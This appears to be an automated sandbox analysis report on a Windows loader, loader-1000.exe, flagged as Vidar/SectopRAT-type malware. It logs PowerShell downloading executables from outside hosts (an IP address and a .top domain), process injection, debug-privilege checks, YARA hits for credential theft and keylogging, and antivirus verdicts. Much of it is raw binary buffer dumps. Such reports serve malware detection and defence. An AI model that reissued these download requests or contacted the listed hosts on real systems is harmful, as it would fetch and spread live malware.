Data received	àkb£.çR&äh¿ h±b?·_ý²Dv¶FXMBvü¶öÂ@N,0j÷ÁØPùjzçÂ5©?M§þ3©¢¥DÑHp4Wñl§5Ï·ËÁtÎé±}9 ,Ü¥¯8;åSÂîª©Â+ÇÅ"\|Ó;9¬Ú£ÕËv$v)3~Z²¦ø¥V$Ä Ö§s¡§¡3ÀÒrù WñyØ»YRÍf7ÁµUøÅ µ@uí²¿Dq§Ç¹ÁW×o·÷5RNãþímôTºQR.SþÑ>!7dîðÇ×}9âúM£AO{ç½WQéäu¨dmPô^Í;©×«¢;S^LÈ±¥Ä ù¯rQ+épïô¸äªÖ¸;fomJf1¸?ç÷o+ýû,5z[fcÔüÕ9_9N±6j£uõ.Øa$2ekU5»yÊcâÆ+_L.ËYµ'64p#/¶¿ýÇ¥5Eó©ÒqzoyÏ%ìuµ¥þñ¯heLs["âügë'ÓÍJTÒe ;ãt¹?ÌñSG¾î®7Þçý£åÇCI?¶µRoM)t$ïíR&¶Ô Ø8@ì@"üB=Ëryúuðò@î)g¤~V òµ¢wÑá\|0þ0"y3ð#<¥\|¯Ïæ% º¿ÞcPn2ÌµÏÙï"è²Bzä!W5+qüIºÝ÷!ÑãÛoStC¿iÈrtñ/sXk>U®U[ùeãr[" nË\|ýßAÿàÏpOÓ¬èZc4ROî^g5êe#yÖk¤ü²Lp5Îö3¼0ôô9ærµEO{ Îç¯§9çÿ@é%¿â'uZ](^zK7Ã^bôR7 }½\|ü4dù-æ¯²ÖÓA FT÷kÏx¤;@3®rÃá×D¾]uä ÅxPShÕ$üùêfË0î'ñ±Z4RcÚÄj÷Ti^cõ§ù=0ÁBÇS¡ÙE¿Wùà¼,<±×g\|VSsîÐí7hPñMxn EØÃÜÞCÓôÚùn@DçWø[Q@´'f g ÖÒ´!,\|¦£b÷ÑF¯`×wÝ@H¾æ÷ èº;ÂaLÜöÉk3tòMPî}Ã$]7+:¿ÆÑÍGK`ä[4ºL÷;èLÿý?³U¨¤1¯Èú³åE¸4«unÇh6Èp4É"ZîHóhã\|·cìÃ`§@eN97 >¸-dßDIÛØÁuHJÁØ3´ÒwFîc¦Q÷Â õ?âÀk_\|[û·¶}TNiZX`¹?¿eøñ½Ö ¼Å«j+3fúUªøOÐJ¥¹ðõSK?=æ±£nÇsX 8H¬_ÇPf¶FË-]°iþpÌgL²nWT¤R)@4<@{t¦«Â^Epø¯ªmôú^¶-ßY] !³ÂQg#H4¸Dï©xJ M`GQÿ9a¿þgÿÖyQ/÷Mè¼(òÍÌö° ÊUºp¦#N óaS?QôoWÍBã ç´Æk.k×ÿñ)·NßàËTRQü¸Ñâám³ñ ôNO Ô©j±í Û= £9:+¸¨=rhÚf®{JANáØ¾£,ù5Î\|br%è®§Ã+/ÐqÐöÌÄí_G\|À.¨±!òèÀN \|<ºVÊC>aóÏLÏ[0ø:Ä\|áÿ søÜr£bh ïSÀ<nýÃÁXö»¢7Q]:Îþbæwy£?À)@QÞÔ §ùÐ= -Ì»"çL¯íxÉGV@§§£ú>à6y_OÒ¤òK7ÈO®ám¯7ù>9¡£MähmSÌ&+%7525ÓÎëV@o]©ÎX®òø4Ãëßx±þÂJ½BÂëÚÐ\ÁÕhþj¯;±vK+}ºzùñ^ÐT>Zõg9XôÚé"º]y±C+~´/IëÀ#T¹ËôûR!ùlméÛ³ì0âú¯zª¶ÉßvÃ/r« ½ðRÇÙE5¯wº°ÉÑ~Ýp¾È<})< 5±q^ë÷âpÂ1´m-cP+\¥$ÇMÑGÒ¥ÿg[Ï&#ÌTÔ±#õ ò2ûòÑ»J½F¦Ý©( Oa§É$Àÿþ´´;»!ú©t(¯ÉÃlã¹ÜÕO¿V®S±ã´Í3¬gº$0n_Wú3QFNè8×_ýÁ:â¤rÙ\|°®m%\|e\èuÊP%w>1Ï«Ð¦`óY2A#à4iÏïzÚu×é7j×frþÆ RA_iÄ]þ#áôLÌj]«oÏcðÇ§[ÖÄ??úå O¸zäÈÄ8°Î5>îÕ4Ôü"¶Åñ-rßKÙâ¾¡¢³©7$´iÆýD¸X`8Dµ]Öè:A ø#¤²A8óyyó~¸aÇ·øMyñ?µÿu>¥ZCÜMÒéÄ Mì11)à gYKD0eËw¹æO`jwÕq©¡0å=xüô y.Z+$¸+îÅ9ÖQ,¯`¬§æ=./!qÊ2îm¨hÊ{\|d+¤U³ZVZv¡ëð#pzDo¹súÈÁUÉõ³ ÇýQÆx0ãLiú¨2E±Æf¸î¶F>Òóð±¶Ä@æGÄ')ja&ëµD}/QdlÃÏ/7¨Ú¥M3¹ÔÕS@üìKv=\|£¯lùhxÅ÷^ÖUÓ&_Qésë²`kÃm>\×Ð§5mßMbL3ä³¶åç;_zÙ¼ãuu?ûf'cµ]Û4³ãÐué9{]Ì´_¤;ÖÐ÷(²C²½¨°6k15Å; ô0s`?^ 3;xËZÿ¢v¦¨;ÿ÷Æ5Üª©½8áf+Ûà]2V!ÕÔûDKxÅi#¨ZÂ]W ®½pjDUq %9²®wµ\|Øl3º¨åÓÑ¤àMÙë±üùyùõß½&ÅÜü*æ4°u×SöÈ7±¤îËj
Data received	WQü°nÕEÀÚ*PÌÄÚÉ´ÞADDOWNGRD §xð3iæ¡"Ràyé[N?,û}k¼`ñÀÿ
Data received	GAþÿV²wUÃ Òn@YKYztòK^»áÞØË«¯«Bz@p màg5¾YÌÈ~QÝ¢ÕhË\ÐyGè+¼1Ü³»fþîY<+xeF^¨ÞGrÍÓ³Þ´L©,´»ÐÖpø×³Ëçº¦Ws¼oPÇÁsuêH5Á r7gyÄ gèAõÍýdmÉ«aLoOô Ç-Ù$á)¢¿VÙ^ï´K\v5ß(ÝÞ0É£ð¼h¹KÅÑ¥l>z¸òS´©g `bÆÅÕ[ì~SöËËKÁþIBò1]JQ=¯¯[Ì.ÓVUèd7¶øñ¬}®¼åq*m7=®ÈìÐ=x VyccªOøYþuY&fM0ÔÛ6{0õ
Data received	cd\|\RY:N¢³:²ôIA9àæâÔTã&NEª+Z õx>9Æ¡3ÏóÎ
Data received	ð
Data received	ÅçFi5`"ÃïËÇ!;!Â]IíVrqâêÐóÛ©ÀÈ\'ZAf¤òUp>pÁE¡û½³I=Æ;ìG®Fö©°PÀ$¿¬¡wÕý wdô8«ÑdÇ;(¥¨ý0ì¦t I0ð¦/Ý(£$N®ÒYg1ÔÞ¸9ÐßFªp$apC$&)8&tÉ¿½lET®×`ê¢qeÚ7õ¹âBWøÀ\|3ÿÑ»c×¦Å½;L¨2ëïpI³7=%Û+=ùÉº»^"ô+H´3m¶´i ~´PJ]ÊhgRs³Ü7¯Þ2Jàþ/T¹&#qzë<bÌá4A\|2ÿ³ÔÙþ]µaÃò?Ù]ª {.è\,O\vÁ±åYi\üò]ÍO «ÉÎ¡Æ[É)À[#/¹ÍiD@-nÕ{súávÏÔN¾'¾Ú¶Â/N¼¬ðXîbÈîpîTFÄ¼×;cD7Q79à§Ýë(_!ÙKMÂâ¬§îVÎ7\ÂÝE}âØ«º·!ÊÁN{rø4È/%=¤d~øÒËÆÖÉþÌ©§9nàt.cWáw`Ç$5ùH
Data received	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Caddy Status: 404 Not Found X-Powered-By: PHP/7.3.25 Date: Fri, 03 May 2024 06:35:36 GMT Content-Length: 17 404 Not Found - 7

Poweshell is sending data to a remote host (11 events)

Data sent	\|f4+qvÖ+µYüÉÍ;Pi³û¦ËßÃ]:</5 ÀÀÀ À 28;ÿ" d2iv78ooxaijb6.cloudfront.net
Data sent	FBAMA®U!póË(/ÌÏ¦q~Z!ÄöjÆááèµOóLJº1\|_0ËÄt@Çýî:@/!±1åÛS Â2¨é²y0{mRîáî@ QUø\|ÐØÜ³ùçô(¶(Þ¸ô3 Jùµ&JªôIÂ
Data sent	ù\|èïàS¤ÃQö=d@>æ%A(¬½_§#@ õCl«?«x æ/ssÎA»ä233Ùsz9ÌUÆ,l9BòN¦v0t&µæ¨G.yê+SteÒáe¶Ðéðo§É¿Ð8¶üF9eÒ®!b»Ü)wIjhD
Data sent	\|f4-}ójÂ$éÃïF^N_P©ð\USËfå>9/5 ÀÀÀ À 28;ÿ" d2iv78ooxaijb6.cloudfront.net
Data sent	FBAasµ±ðjXÏ¼7â/g6Â_µ.o¹vãcpr\|ã:ñÓîD®ûB@[À&+ãXúñ7×1îùc0Ü$ó[¹Å§5"Q"Vp¬RPÃýxéFj\|}ÈUÂMh$º<¼~ÏÂO«R
Data sent	Èæ]íA«+O ®íÜã§ ±9ÄåÚÆd aÈ Õü1böðÛ;2±¢¤émxÞCÈ#·`qi âo×²OÔ^îÃp½ÂN&ìO{Ù,jlÈSj·mR.¨)\¤àÚ"Õ¤?ñéÁHi³Ü
Data sent	GET /ISetup1.exe HTTP/1.1 Host: 185.172.128.59 Connection: Keep-Alive
Data sent	\|f40 eøZ?¿¼3´)æ`íWè·u~J¸/5 ÀÀÀ À 28;ÿ" d2iv78ooxaijb6.cloudfront.net
Data sent	FBAÙÍª£:¸;[Ú½WzççÝÙE»\|¡]Ö£¼KÖ¯[{>U7¬® (uµú'ÍA>mpt·<èäÉ0³®fhÁÚØïyà#Tùe:ùïäêzîEé0êîM¸$« g½¹ç®8
Data sent	°i\½35£²ì¢û£¼~¸Ås~¢Õ¥øê({oÕ«¨¥¦W{Üt¦Ó{ö¡îBúÅÏ [yÉVÄ~Q gh.Ã¨Y]TáPuocR)ÌñvïåqÔ×htú lQÏåÿ2i½³s& Ç6»ÔâS^ð*Èî#ôöØX3èÊ/â¹¶]N6¾?4sp8ßB»/TØôéøù º
Data sent	GET /f/fvgbm0428902.txt HTTP/1.1 User-Agent: InnoDownloadPlugin/1.5 Host: 240429000936002.mjt.kqri92.top Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW May 3, 2024, 3:33 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 3, 2024, 3:33 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 3, 2024, 3:33 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Communicates with host for which no DNS query was performed (1 event)

host

185.172.128.59

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (11 events)

Time & API	Arguments	Status	Return
send May 3, 2024, 3:33 p.m.	buffer: \|f4+qvÖ+µYüÉÍ;Pi³û¦ËßÃ]:</5 ÀÀÀ À 28;ÿ" d2iv78ooxaijb6.cloudfront.net socket: 1420 sent: 133	1	133
send May 3, 2024, 3:33 p.m.	buffer: FBAMA®U!póË(/ÌÏ¦q~Z!ÄöjÆááèµOóLJº1\|_0ËÄt@Çýî:@/!±1åÛS Â2¨é²y0{mRîáî@ QUø\|ÐØÜ³ùçô(¶(Þ¸ô3 Jùµ&JªôIÂ socket: 1420 sent: 134	1	134
send May 3, 2024, 3:33 p.m.	buffer: ù\|èïàS¤ÃQö=d@>æ%A(¬½_§#@ õCl«?«x æ/ssÎA»ä233Ùsz9ÌUÆ,l9BòN¦v0t&µæ¨G.yê+SteÒáe¶Ðéðo§É¿Ð8¶üF9eÒ®!b»Ü)wIjhD socket: 1420 sent: 133	1	133
send May 3, 2024, 3:33 p.m.	buffer: \|f4-}ójÂ$éÃïF^N_P©ð\USËfå>9/5 ÀÀÀ À 28;ÿ" d2iv78ooxaijb6.cloudfront.net socket: 1436 sent: 133	1	133
send May 3, 2024, 3:33 p.m.	buffer: FBAasµ±ðjXÏ¼7â/g6Â_µ.o¹vãcpr\|ã:ñÓîD®ûB@[À&+ãXúñ7×1îùc0Ü$ó[¹Å§5"Q"Vp¬RPÃýxéFj\|}ÈUÂMh$º<¼~ÏÂO«R socket: 1436 sent: 134	1	134
send May 3, 2024, 3:33 p.m.	buffer: Èæ]íA«+O ®íÜã§ ±9ÄåÚÆd aÈ Õü1böðÛ;2±¢¤émxÞCÈ#·`qi âo×²OÔ^îÃp½ÂN&ìO{Ù,jlÈSj·mR.¨)\¤àÚ"Õ¤?ñéÁHi³Ü socket: 1436 sent: 133	1	133
send May 3, 2024, 3:33 p.m.	buffer: GET /ISetup1.exe HTTP/1.1 Host: 185.172.128.59 Connection: Keep-Alive socket: 1944 sent: 75	1	75
send May 3, 2024, 3:33 p.m.	buffer: \|f40 eøZ?¿¼3´)æ`íWè·u~J¸/5 ÀÀÀ À 28;ÿ" d2iv78ooxaijb6.cloudfront.net socket: 1436 sent: 133	1	133
send May 3, 2024, 3:33 p.m.	buffer: FBAÙÍª£:¸;[Ú½WzççÝÙE»\|¡]Ö£¼KÖ¯[{>U7¬® (uµú'ÍA>mpt·<èäÉ0³®fhÁÚØïyà#Tùe:ùïäêzîEé0êîM¸$« g½¹ç®8 socket: 1436 sent: 134	1	134
send May 3, 2024, 3:33 p.m.	buffer: °i\½35£²ì¢û£¼~¸Ås~¢Õ¥øê({oÕ«¨¥¦W{Üt¦Ó{ö¡îBúÅÏ [yÉVÄ~Q gh.Ã¨Y]TáPuocR)ÌñvïåqÔ×htú lQÏåÿ2i½³s& Ç6»ÔâS^ð*Èî#ôöØX3èÊ/â¹¶]N6¾?4sp8ßB»/TØôéøù º socket: 1436 sent: 181	1	181
send May 3, 2024, 3:33 p.m.	buffer: GET /f/fvgbm0428902.txt HTTP/1.1 User-Agent: InnoDownloadPlugin/1.5 Host: 240429000936002.mjt.kqri92.top Connection: Keep-Alive socket: 1944 sent: 134	1	134

An executable file was downloaded by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv May 3, 2024, 3:33 p.m.	buffer: HTTP/1.1 200 OK Date: Fri, 03 May 2024 06:35:31 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 May 2024 06:30:01 GMT ETag: "74c01-61786d9769497" Accept-Ranges: bytes Content-Length: 478209 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $2×Çv¶©Lv¶©Lv¶©L{ävLj¶©L{äIL ¶©L{äHL]¶©LÎ:Ls¶©Lv¶¨L¶©LÃ(LLw¶©L{ärLw¶©LÃ(wLw¶©LRichv¶©LPELóSYdàüÞb?@ðc$_dt<°aù2à8Èi@p.textåûü `.rdata²ln@@.dataH&`ªn@À.rsrcù2°a4@@¹\¡èuhÛAè)YÃ¹d¡èÈhÑAè)YÃ¹P¡èhÇAès)YÃj¹X¡èÃj¹L¡èÃj¹`¡èûÃj¹T¡èîÃÌÌÌÌÌÌÌÌÌÌUìQQìòL$ò$èÝ]øòEøÄå]ÃUìQQQQò$è(%Ý]øòEøYYå]ÃUìVEñPèÇ1AÆ^]ÂÇ1AéÐUìVñèêÿÿÿöEtVèª)YÆ^]ÂUìE]ÃUìE8u3À]ÃPè×%Y]ÃUì}uE]Ã]éUì}uE]Ã]é<UìEE]ÃUìEÁ]ÂÇtAÁÃÇtAÃUì3À;MÀ]ÂUìVñèßÿÿÿöEtVè)YÆ^]ÂÃAÃUìEEAÁ]ÂÃAÃUìWùMèîÿÿÿPÏèæÿÿÿÈèÿÿÿÀtMVèÏÿÿÿÏðèÆÿÿÿ;Æ^u3À@ë3À_]ÂUìQÿuMèÿÿÿE]ÂUìQQÿuUøÿuRÿPÈèÿÿÿå]ÂUìVñMèXÿÿÿPÎèÿÿÿ^ÀtMè@ÿÿÿ;Eu3À@ë3À]ÂVñèêþÿÿÇAÆ^Ã¸°fAÃUìQÿueüè6YÀ¹¸fAEÈQMè Eå]ÂUìVñèöEtVèÓ'YÆ^]ÂéþÿÿVñèÿÿÿÇ¬AÆ^Ã¸ÈfAÃUìQeü}uMhÔfAè< ëÿuÿuèoÿÿÿEå]ÂUìVñèöEtVèf'YÆ^]ÂéÿÿÿVñè"ÿÿÿÇÈAÆ^Ã¸ìfAÃUìQÿueüèYÀ¹¸fAEÈQMèÆ Eå]ÂUìÿuè8YÀtè>ëè=MPÿuèôýÿÿE]ÂUìVñèöEtVèÎ&YÆ^]Âéöþÿÿ¸\¡Ã¸P¡Ãá4ïÆÃUìì SVñ3Û=@¡WuÌ~EèuSäöÿÿPSÿHA¡AMôEØ¡A]ôÇEÔ¹y7EÜè¡ÿÿÿ¡AEô?5Aj EÐ[ÇEäEäEèÁàÆÇEð@.ëí=@¡©Eü¡<¡DEðeð=@¡ë£<¡¡¨¡DEð£¨¡EôEèEðEèÁèEøMü3MðEøEÐ3ÁMü @¡Ç8¡î=êô received: 2600 socket: 1944	1	2600	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2676 resumed a thread in remote process 2984
NtResumeThread May 3, 2024, 3:33 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2984	1	0	0

Creates a suspicious Powershell process (3 events)

value	Uses powershell to execute a file download from the command line
value	Uses powershell to execute a file download from the command line
value	Uses powershell to execute a file download from the command line

The process powershell.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\Temp\i1.exe

File has been identified by 22 AntiVirus engines on VirusTotal as malicious (22 events)

Bkav	W32.AIDetectMalware
Cylance	unsafe
VirIT	Trojan.Win32.Genus.VIN
Symantec	Trojan.Gen.MBT
Elastic	malicious (high confidence)
APEX	Malicious
Avast	FileRepMalware [Pws]
Kaspersky	HEUR:Trojan.Win32.Agent.gen
TrendMicro	TrojanSpy.Win32.VIDAR.YXEEBZ
Trapmine	malicious.moderate.ml.score
FireEye	Generic.mg.d58a180c5d854484
Sophos	Mal/Generic-S
Webroot	W32.Malware.Gen
Kingsoft	Win32.Trojan.Agent.gen
Gridinsoft	Trojan.Win32.SectopRAT.tr
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm	HEUR:Trojan.Win32.Agent.gen
DeepInstinct	MALICIOUS
VBA32	suspected of Trojan.Downloader.gen
TrendMicro-HouseCall	TrojanSpy.Win32.VIDAR.YXEEBZ
AVG	FileRepMalware [Pws]
Paloalto	generic.ml

loader-1000.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All